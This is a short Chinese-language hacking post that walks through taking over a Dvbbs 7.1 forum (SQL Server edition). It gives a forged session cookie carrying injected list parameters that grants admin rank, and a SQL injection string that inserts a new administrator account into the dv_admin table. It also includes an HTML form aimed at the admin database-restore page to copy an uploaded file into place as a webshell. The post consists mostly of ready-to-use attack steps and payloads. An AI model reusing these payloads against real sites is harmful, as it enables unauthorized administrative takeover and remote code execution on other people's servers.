最新dvbbs 7.1sql提權得shell

dvbbs 7.1跳過死迴圈，按linzi的方法只能是有一個系統管理權限，而只是新手上路的等級

如果是sql版，就不好暴庫，事實上好像只需要抓取SESSION即可，不要登陸任何使用者。

欺騙時不要關閉假死的那個ie

這個是死迴圈的SESSION:

ASPSESSIONIDQCTRTQAC=HOPNBJLCKHGDDPNAAIOCKGCJ

加入或替換到可以欺騙的瀏覽器的cookie欄。

List=list5+and+1%3D2=1&list5+and+1%3D1=1&list1+and+1%3D2=1&list1+and+1%3D1=1&list3+and+1%3D2=1&list3+and+1%3D1=1; ASPSESSIONIDQCTRTQAC=HOPNBJLCKHGDDPNAAIOCKGCJ

然後點任何板塊

就能發現，你欺騙的使用者和等級都是管理員了。

後台管理員可以通過使用者獎勵那裡加入

test','127.0.0.1',5) ;insert into dv_admin (username,[password],flag,adduser) values ('jinsdb','4ac646c9e65a1769','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37','jinsdb');--

dvbbs7.1 sql 後台得ｓｈｅｌｌ

<form action="http://127.0.0.1/bbs/admin/data.asp?act...t=Restore" method="post">

<p>已上傳檔案的位置：<input name="Dbpath" type="text" size="80"></p>

<p>要複製到的位置：<input name="backpath" type="text" size="80"></p>

<p><input type="submit" value="提交"></p>

</form>

好像7.1的usercookies只是個幌子

根本沒必要

去掉了也一樣可以使用

搞笑